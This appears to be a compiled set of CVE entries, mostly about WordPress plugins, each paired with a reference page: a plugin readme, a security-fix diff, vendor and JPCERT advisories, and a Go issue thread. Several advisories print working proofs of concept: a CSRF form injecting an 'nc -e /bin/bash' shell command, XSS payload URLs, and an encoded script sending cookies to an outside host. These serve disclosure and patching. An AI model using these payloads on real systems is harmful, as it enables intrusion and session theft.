The "Forminator Contact Form, Poll & Quiz Builder" plugin before 1.6 for WordPress has XSS via a custom input field of a poll.

_Not your typical form-making plugin. Forminator is the easy-to-use WordPress form builder plugin for every website and situation. It’s the easiest way to create any form – contact form, order form, payment form, email form, feedback widgets, interactive polls with real-time results, buzzfeed-style “no wrong answer” quizzes, service estimators, and registration forms with payment options including PayPal and Stripe._

It’s the magical WordPress form builder for, well, everyone!

Forminator’s drag and drop visual builder makes it easy to setup and add forms to your WordPress website. Collect information, make your content interactive and generate more conversions with Forminator.

**Forminator Forms, Surveys, Quizzes, Polls, Calculations and More…**

*   Forms – Custom forms for all your needs with as many fields as you like.
*   Polls – Interactive polls to collect users opinions, with lots of dynamic options and settings.
*   Quizzes – Fun or challenging quizzes for your visitors to take and share on social media.
*   Calculations – Collect information, generate leads, take orders, and engage visitors.
*   Payments – Take payments, donations, down payments, sell merch with the included Stripe and PayPal integrations.

**Learn The Ropes With These Hands-On Forminator Tutorials**

*   Creating the Perfect Contact Form with Forminator
*   Create an Easy Payment Form (for free!) with Forminator
*   How to Get the Most Out of Using Forminator
*   How To Capture eSignatures Using Forminator
*   How To Collect Emails and Generate Leads With a Forminator Quiz

**Accept Payments With Stripe and PayPal**

Start taking payments with Forminator. No Pro upgrade required! SCA compliant Stripe and PayPal come included. Just enter your publish keys to activate the Forminator payment module for both fixed and variable payments. Check out how it works in the video below:

**Stripe Verified Partner**

Forminator is also proud to be a Stripe Verified Partner. This partnership allows us to help you get the most out of our Stripe integration thanks to additional resources, e.g. the ability to escalate support questions, or request custom pricing reviews.

**Calculations are a Lead Magnet**

There are literally thousands of combinations for adding value to your site with Calculations:

*   Registration forms with upgrade packages
*   Sell a tee shirt with size, color, price, and tax variations
*   Add a BMI and/or calorie intake calculator to your health and fitness blog
*   Embed a loan calculator into your finance site
*   Give a midwife a due date calculator
*   Insta-quote or service estimator
*   Put an ROI calculator on your agency site
*   And on, and on, and on…

**Drag and Drop Form Blocks**

Forminator has a bunch of drag and drop blocks that make it easy to put forms together – name, email, phone number, text, file upload, website, date, time, number, HTML, pagination, radio boxes, GDPR-friendly opt-ins, payments, calculations, and hidden field.

**Your Favorite Integrations Including +1000 Apps Already Added**

Forminator comes stacked with crowd favorite third-party integrations – email services, CRM, storage, and project managers.

*   HubSpot
*   Campaign Monitor
*   ActiveCampaign
*   Google Sheets
*   Webhooks (Zapier, Make, Tray, etc)
*   Trello
*   MailChimp
*   AWeber
*   Slack

**Develop And Sell Your Own Extensions**

Forminator is free and open to millions of WordPress users! Use the developer API and the included hooks and filters to build your own integrations or custom apps and sell them or give them away free here on WordPress.org.

**Poll Your Visitors**

Polls are a brilliant way to engage visitors. Forminator gives real-time feedback with live stats displayed in beautiful pie charts and graphs.

**Your Own Facebook-Style Quizzes**

Who hasn’t been roped into taking “IQ tests” and “figure out which Star Wars character you are” quizzes on Facebook? Now you can run all that traffic to your site. Create both knowledge and no wrong answer quizzes with Forminator.

**Collect Leads With Your Quizzes**

Looking to use your quizzes for more than just entertainment and a way to engage your audience? Forminator also allows you to collect participants’ details (e.g., name, email, etc.) by integrating a lead generation form in your quiz. See how it works below:

**Gutenberg Block**

Forminator’s got you, whether you’re a classic editor or Gutenberg early adapter. Say goodbye to shortcodes and quickly add forms to posts with the Forminator block for Gutenberg.

**Email Routing and Pre-Populate**

Make your site more efficient from visitor input to email response times. Use query strings to pre-fill your visitor information and deliver forms direct to specific teams with email routing, auto-response and conditions.

**User Front End Post Submissions**

Want to let your visitors share a post submission without needing access to the WordPress dashboard? With Forminator visitors can submit post ideas from the front end of your site so you can easily curate and publish their thoughts. Assign post to a default author, save to draft, publish immediately, etc.

**Google reCAPTCHA**

You don’t want your inbox flooded with a bunch of form spam. Google ReCAPTCHA is free with Forminator. Now you can stop the crazy bots without making it hard on your visitors. No more hard to read random phrases.

**Collect, Track and GDPR Ready**

Forminator stores and organizes submissions so you can sort, analyze and manage responses – of course, all while making it super easy to comply with the GDPR and other legal privacy policies.

**Import Your Existing Contact Form 7 Data**

Looking to move existing forms over from CF7? Forminator’s Import Wizard allows you to migrate all, or selected forms in a matter of clicks. You can also transfer data from a range of Contact Form 7 add-ons and settings.

**Custom Login and Registration Forms**

Create and embed custom login and registration forms for your sites (or multisites!). Take L&R forms to the next level: choose from a range of form fields, and customize settings, style, and behavior. Learn more in the video below:

**Multi-file Upload Field**

Along with enabling single file uploads, Forminator takes things up a notch by allowing users to upload multiple files. You can also choose to set specific file types, limit the number of files that can be uploaded, as well as the individual file size. The upload field’s drag and drop interface also makes it a breeze for users to upload files.

**Group And Repeat Form Fields**

The Field Group feature allows you to group any number of fields together in one form. You can also enable users to add as many additional field groups as needed when filling out your form. Great for repeatable data entry such as employment history, event attendees, lists, etc.

**Advanced Date Field Restrictions**

Perfect for appointment and hotel bookings – Forminator’s Date Picker Limits feature allows you to restrict the available dates shown on your date field calendar. For example, you might show future dates only, a selected number of dates from today, dates between a specific date range, specific days of the week, and more!

**Add An E-Signature Form Field (Pro Only)\***

Have an online application that requires a signature, or a contract you need your customers to sign? Forminator’s E-signature feature allows visitors to use their mouse, trackpad, or finger (on touch devices) to leave a signature upon submitting the form. Just insert the “E-Signature” field and voila!

**Receive Subscriptions and Recurring Payments on Stripe (Pro Only)\***

Create fully-customized subscription forms with Forminator Pro’s Stripe Subscription add-on. Allow your customers to choose plans/pricing, billing cycle, custom upsells, a free trial option, and of course, make secure card payments. Forminator also saves you time by instantly and automatically syncing all subscription form data straight to your Stripe account.

\***Note:** These features are only available with Forminator Pro. Get instant access to Forminator Pro – as well as all our other premium plugins, managed WP hosting, our site management platform: The Hub, and 24/7 expert support – all with a WPMU DEV membership.

**What Do People Say About Forminator?**

★★★★★

> Amazing plugin, it really seems that only your imagination can limit its uses. Loads of features like taking payments, calendar, for free. Can’t believe everything I need is in there, it sparks creativity and makes it fun to work on a website. – araca

★★★★★

> This plugin has an excellent, well-thought-out, well-designed UI and offers everything I was looking for (and I think I’ve tried every serious competitor). – tvsmvp

★★★★★

> This plugin is the best free form builder by far! I have researched many but this is so easy to use… Try it. I am SURE you will LOVE IT. – johncarteroz

★★★★★

> Great interface design, super easy to use and great functionality. I don’t normally write reviews, but I loved it so much, I just had to this time! – istavridi

**Shameless Plug(ins)**

Love Forminator! WPMU DEV has some other awesome free plugins you should checkout.

*   Smush – Image Compression and Optimization
*   Hummingbird – Page Speed Optimization
*   Hustle – Pop-ups, Slide-ins and Email Opt-ins
*   SmartCrawl – SEO Optimizer
*   Defender – Security, Monitoring, and Hack Protection

**About Us**

WPMU DEV is a premium supplier of quality WordPress plugins, services and support. Join here:  
https://wpmudev.com/

Don’t forget to stay up to date on everything WordPress from the Internet’s number one resource:  
WPMU DEV Blog

Hey, one more thing… we hope you enjoy our free offerings as much as we’ve loved making them for you!

**Contact and Credits**

WPMU DEV

CVE-2019-9567: Forminator – Contact Form, Payment Form & Custom Form Builder

The Plainview Activity Monitor plugin before 20180826 for WordPress is vulnerable to OS command injection via shell metacharacters in the ip parameter of a wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools request.

<html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
          <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
          <input type="hidden" name="lookup" value="Lookup" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

CVE-2018-15877: Offensive Security’s Exploit Database Archive

The WP Live Chat Support plugin before 8.0.06 for WordPress has stored XSS via the Name field.

CVE-2018-9864

admin/partials/wp-splashing-admin-main.php in the Splashing Images plugin (wp-splashing-images) before 2.1.1 for WordPress allows authenticated (administrator, editor, or author) remote attackers to conduct PHP Object Injection attacks via crafted serialized data in the 'session' HTTP GET parameter to wp-admin/upload.php.

Timestamp:

01/22/2018 07:29:38 PM (5 years ago)

janhenckens

Message:

Security update  

Location:

wp-splashing-images/trunk

Files:

  

*   README.txt (2 diffs)
*   admin/partials/wp-splashing-admin-main.php (1 diff)
*   admin/partials/wp-splashing-admin-sidebar.php (1 diff)
*   wp-splashing-images.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **wp-splashing-images/trunk/README.txt**
    
    r1799926
    
    r1807349
    
     
    
    5
    
    5
    
    Requires at least: 4.0
    
    6
    
    6
    
    Tested up to: 4.9.1
    
    7
    
     
    
    Stable tag: 2.1.0
    
     
    
    7
    
    Stable tag: 2.1.1
    
    8
    
    8
    
    License: GPLv2 or later
    
    9
    
    9
    
    License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    33
    
    33
    
    \== Changelog ==
    
    34
    
    34
    
     
    
    35
    
    \= 2.1.1 =
    
     
    
    36
    
    \* Fixed 2 security issues
    
     
    
    37
    
    35
    
    38
    
    \= 2.1 =
    
    36
    
    39
    
    \* Updated unsplash library and use the new download function
    
*   **wp-splashing-images/trunk/admin/partials/wp-splashing-admin-main.php**
    
    r1799926
    
    r1807349
    
     
    
    20
    
    20
    
        </h1>
    
    21
    
    21
    
            <?php if($\_GET\['session'\]) {
    
    22
    
     
    
    23
    
     
    
                $data = unserialize(base64\_decode($\_GET\['session'\]));
    
     
    
    22
    
                $data = unserialize(base64\_decode($\_GET\['session'\]), \['allowed\_classes' => false\]);
    
    24
    
    23
    
                $this->unsplash->saveTokens($data\['token'\]);
    
    25
    
    24
    
                $user = $this->unsplash->getUser(); ?>
    
*   **wp-splashing-images/trunk/admin/partials/wp-splashing-admin-sidebar.php**
    
    r1675965
    
    r1807349
    
     
    
    7
    
    7
    
                    <form id="splashing-search" method="get" action="<?php echo esc\_url(admin\_url('admin-post.php')); ?>">
    
    8
    
    8
    
                        <label class="screen-reader-text" for="post-search-input">Search Posts:</label>
    
    9
    
     
    
                        <input type="search" id="post-search-input-splashing" name="search" value="<?php echo $\_GET\['search'\]; ?>" placeholder="<?php \_e('Search unsplash.com', 'wp-splashing-images'); ?>">
    
     
    
    9
    
                        <input type="search" id="post-search-input-splashing" name="search" value="<?php echo sanitize\_title\_for\_query($\_GET\['search'\]); ?>" placeholder="<?php \_e('Search unsplash.com', 'wp-splashing-images'); ?>">
    
    10
    
    10
    
                        <input type="hidden" name="action" value="wp\_splashing\_search">
    
    11
    
    11
    
                        <input type="hidden" name="paged" value="1">
    
*   **wp-splashing-images/trunk/wp-splashing-images.php**
    
    r1799926
    
    r1807349
    
     
    
    17
    
    17
    
     \* Plugin URI:        http://studioespresso.co
    
    18
    
    18
    
     \* Description:       Unsplash.com), right in your dashboard. Add photos with one click and use them in your content right away.
    
    19
    
     
    
     \* Version:           2.1.0
    
     
    
    19
    
     \* Version:           2.1.1
    
    20
    
    20
    
     \* Author:            Studio Espresso
    
    21
    
    21
    
     \* Author URI:        http://studioespresso.co
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2018-6195: Changeset 1807349 for wp-splashing-images – WordPress Plugin Repository

Cross-site scripting vulnerability in WP Live Chat Support prior to version 7.0.07 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

**Changeset view not shown**, since the total size (8.7 MB) exceeds 4.0 MB

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2017-2187: Changeset 1658232 – WordPress Plugin Repository

Cross-site scripting vulnerability in YOP Poll versions prior to 5.8.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

Published:2017/03/23  Last Updated:2017/03/23

**Overview**

The WordPress plugin "YOP Poll" contains a cross-site scripting vulnerability.

**Products Affected**

*   YOP Poll versions prior to 5.8.1

**Description**

The WordPress plugin "YOP Poll" contains a stored cross-site scripting (CWE-79) vulnerability.

**Impact**

An arbitrary script may be executed on the web browser of a user accessing the poll generated by the application.

**Solution**

**Update the plugin**  
Update the plugin according to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:N/AC:L/Au:S/C:N/I:P/A:N

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Credit**

Sho Ueshima, Takashi Honda, Tsuyoshi Ogawa and Minaho Umehara of SIE Co.,Ltd. reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2017-2127: WordPress plugin "YOP Poll" vulnerable to cross-site scripting

Untrusted search path vulnerability in Go before 1.5.4 and 1.6.x before 1.6.1 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, related to use of the LoadLibrary function.

Here is one of many programs I use on my PC.

    C:\Program Files (x86)\Git\bin>objdump -p git.exe | grep Load
    LoaderFlags             00000000
    Entry a 00000000 00000000 Load Configuration Directory
            19cc7c    524  LoadLibraryA     7dd7499f
    
    C:\Program Files (x86)\Git\bin>dir *.dll
     Volume in drive C has no label.
     Volume Serial Number is F0C8-6DFE
    
     Directory of C:\Program Files (x86)\Git\bin
    
    07/12/2014  06:01 PM         1,154,665 libapr-0-0.dll
    07/12/2014  06:01 PM           992,438 libaprutil-0-0.dll
    07/12/2014  06:01 PM         1,724,229 libcrypto.dll
    07/12/2014  06:01 PM           360,448 libcurl.dll
    07/12/2014  06:01 PM           958,945 libexpat-0.dll
    07/12/2014  06:01 PM           443,550 libgsasl-7.dll
    07/12/2014  06:01 PM         1,241,889 libiconv-2.dll
    07/12/2014  06:01 PM           293,380 libintl-8.dll
    07/12/2014  06:01 PM         2,076,008 libneon-25.dll
    07/12/2014  06:01 PM         4,884,531 libpoppler-7.dll
    07/12/2014  06:01 PM           391,048 libssl.dll
    07/12/2014  06:01 PM         1,218,359 libsvn_client-1-0.dll
    07/12/2014  06:01 PM           851,272 libsvn_delta-1-0.dll
    07/12/2014  06:01 PM           798,881 libsvn_diff-1-0.dll
    07/12/2014  06:01 PM           792,459 libsvn_fs-1-0.dll
    07/12/2014  06:01 PM         1,028,321 libsvn_fs_fs-1-0.dll
    07/12/2014  06:01 PM           759,216 libsvn_ra-1-0.dll
    07/12/2014  06:01 PM         1,017,784 libsvn_ra_dav-1-0.dll
    07/12/2014  06:01 PM           800,669 libsvn_ra_local-1-0.dll
    07/12/2014  06:01 PM           930,046 libsvn_ra_svn-1-0.dll
    07/12/2014  06:01 PM         1,055,893 libsvn_repos-1-0.dll
    07/12/2014  06:01 PM         1,248,729 libsvn_subr-1-0.dll
    07/12/2014  06:01 PM           864,473 libsvn_swig_perl-1-0.dll
    07/12/2014  06:01 PM         1,253,965 libsvn_wc-1-0.dll
    07/12/2014  06:01 PM           812,063 libW11.dll
    07/12/2014  06:01 PM           194,947 libz.dll
    07/12/2014  06:01 PM           777,544 msys-1.0.dll
    07/12/2014  06:01 PM         1,282,560 msys-crypto-1.0.0.dll
    07/12/2014  06:01 PM            19,968 msys-minires.dll
    07/12/2014  06:01 PM           939,520 msys-perl5_8.dll
    07/12/2014  06:01 PM            82,852 msys-regex-1.dll
    07/12/2014  06:01 PM           328,192 msys-ssl-1.0.0.dll
    07/12/2014  06:01 PM            91,792 msys-z.dll
    07/12/2014  06:01 PM            52,064 msysltdl-3.dll
    07/12/2014  06:01 PM            65,124 pthreadGC2.dll
    07/12/2014  06:01 PM         1,152,701 tcl85.dll
    07/12/2014  06:01 PM            30,023 tclpip85.dll
    07/12/2014  06:01 PM         1,410,875 tk85.dll
                  38 File(s)     34,381,423 bytes
                   0 Dir(s)  94,420,832,256 bytes free
    
    C:\Program Files (x86)\Git\bin>
    

Just to demonstrate that behaviour you're about to break is actually used by some products.

> See the top comment in this bug: "2) Add a LoadLibraryEx to x/sys/win so that users can still get at the old behavior if they want it (by appropriate passing of flags)."
> 
> (A flags of 0 would mean the current behavior)

But that will still break my existing code. I don't personally have problem like described in https://textplain.wordpress.com/2015/12/18/dll-hijacking-just-wont-die/. Why should I suffer? Why cannot we do what I suggested above? What is the downside?

Alex

CVE-2016-3958: syscall: guard against Windows DLL preloading attacks   · Issue #14959 · golang/go

The phar_make_dirstream function in ext/phar/dirstream.c in PHP before 5.6.18 and 7.x before 7.0.3 mishandles zero-size ././@LongLink files, which allows remote attackers to cause a denial of service (uninitialized pointer dereference) or possibly have unspecified other impact via a crafted TAR archive.

CVE-2016-4343: PHP: PHP 7 ChangeLog

Cross-site scripting (XSS) vulnerability in the Blubrry PowerPress Podcasting plugin before 6.0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cat parameter in a powerpress-editcategoryfeed action in the powerpressadmin_categoryfeeds.php page to wp-admin/admin.php.

**Full Disclosure mailing list archives**

_From_: Onur Yilmaz <onur () netsparker com>  
_Date_: Thu, 29 Jan 2015 17:19:29 +0200  

Information
------------
Advisory by Netsparker
Name: XSS Vulnerability in Blubrry PowerPress
Affected Software : Blubrry PowerPress
Affected Versions: 6.0 and possibly below
Vendor Homepage : https://wordpress.org/plugins/powerpress/
Vulnerability Type : Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-1385
Netsparker Advisory Reference : NS-15-001

Description
-----------
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user?s session. This means that the malicious
hacker can change the logged in user?s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator?s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner.
--------------------

Proof of Concept URLs for XSS in Blubrry PowerPress WordPress plugin:

/wp-admin/admin.php?page=powerpress/powerpressadmin\_categoryfeeds.php&action=powerpress-editcategoryfeed&cat=1';"--></style></scRipt><scRipt>alert(0x014068)</scRipt>

For more information on cross-site scripting vulnerabilities read the
following article on Cross-site Scripting (XSS) -
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline
--------------------
22/01/2015 - First Contact
26/01/2015 - Vulnerability fixed
29/01/2015 - Advisory released

Solution
--------------------
Download version 6.0.1 which includes fix for this vulnerability.

Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker
--------------------
Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner. For more information visit our website on
https://www.netsparker.com

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Blubrry PowerPress Security Advisory - XSS Vulnerability - CVE-2015-1385** _Onur Yilmaz (Jan 29)_

CVE-2015-1385: Full Disclosure: Blubrry PowerPress Security Advisory - XSS Vulnerability

Cross-site request forgery (CSRF) vulnerability in the CreativeMinds CM Downloads Manager plugin before 2.0.7 for WordPress allows remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the addons_title parameter in the CMDM_admin_settings page to wp-admin/admin.php.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1Product: WordPress plugin cm-download-managerPlugin page: https://wordpress.org/plugins/cm-download-manager/Vendor: CreativeMindsSolutions http://cminds.com/Vulnerability Type: CWE-79: Cross-site scriptingVulnerable Versions: 2.0.6 and belowFixed Version: 2.0.7Solution Status: Fixed by VendorVendor Notification: 2014-11-27Public Disclosure: 2014-12-02CVE Reference: N/A. Only assigned for CSRFCriticality: LowVulnerability details:CM Download Manager plugin for WordPress contains a flaw that allows a storedcross-site scripting (XSS) attack. This flaw exists because the/wp-admin/admin.php script does not validate input to the 'addons_title' POSTparameter before returning it to users. This allows an authenticated remoteattacker to create a specially crafted request that would execute arbitraryscript code in a user's browser session within the trust relationship betweentheir browser and the server.Root cause:The software incorrectly neutralizes user-controllable input before it is placedin output that is used as a web page that is served to authenticated users.Proof-of-concept:Insert following code to CM Downloads -> Settings -> "Downloads listing title"field with CSRF attack.<script>var foo = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 110,101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 46, 115, 114, 99, 61, 34, 104, 116,116, 112, 58, 47, 47, 98, 117, 103, 115, 46, 102, 105, 47, 99, 111, 111, 107,105, 101, 46, 112, 104, 112, 63, 105, 100, 61, 34, 43, 100, 111, 99, 117, 109,101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105,112, 116, 62);document.write(foo);</script>- ---------------Product: WordPress plugin cm-download-managerPlugin page: https://wordpress.org/plugins/cm-download-manager/Vendor: CreativeMindsSolutions http://cminds.com/Vulnerability Type: CWE-352: Cross-Site Request ForgeryVulnerable Versions: 2.0.6 and belowFixed Version: 2.0.7Solution Status: Fixed by VendorVendor Notification: 2014-11-27Public Disclosure: 2014-12-02CVE Reference: CVE-2014-9129Criticality: LowVulnerability details:CM Download Manager plugin for WordPress contains a flaw on theCMDM_admin_settings page as HTTP requests to /wp-admin/admin.php do notrequire multiple steps, explicit confirmation, or a unique token when performingsensitive actions. By tricking authenticated user into following a speciallycrafted link, a context-dependent attacker can perform a CSRF attack causing thevictim to insert and execute arbitrary script code.Root cause:The web application does not sufficiently verify whether a well-formed, valid,consistent request was intentionally provided by the user who submitted therequest.Proof-of-concept:<html><body><h3>https://example.org/wp-admin/admin.php?page=CMDM_admin_settings</h3><form id="f1" method="POST"action="https://example.com/wp-admin/admin.php?page=CMDM_admin_settings"><table><input type="text" name="addons_title" value="XSS"></table></form><script type="text/javascript">document.getElementById("f1").submit();</script></body></html>Notes:Other pages and/or parameters are also possibly insecure (not tested). Suggestedto do a proper security audit for their software. Vendor did not mentionsecurity fix or CVE in ChangeLog even it was discussed several times. Referencesbelow.Cross-site scripting:    http://cwe.mitre.org/data/definitions/79.html    https://scapsync.com/cwe/CWE-79    https://en.wikipedia.org/wiki/Cross-site_scriptingCross-Site Request Forgery:    http://cwe.mitre.org/data/definitions/352.html    https://scapsync.com/cwe/CWE-352     https://en.wikipedia.org/wiki/Cross-site_request_forgery- ---Henri Salo-----BEGIN PGP SIGNATURE-----Version: GnuPG v1.4.12 (GNU/Linux)iEYEARECAAYFAlR96QIACgkQXf6hBi6kbk8peQCgtWgwrqs7ahsAw30Ndnu70N7/l98An1m+MqJ7xJ8+VcPbMxo72i1Xs2oT=bUVi-----END PGP SIGNATURE-----

Tag

#wordpress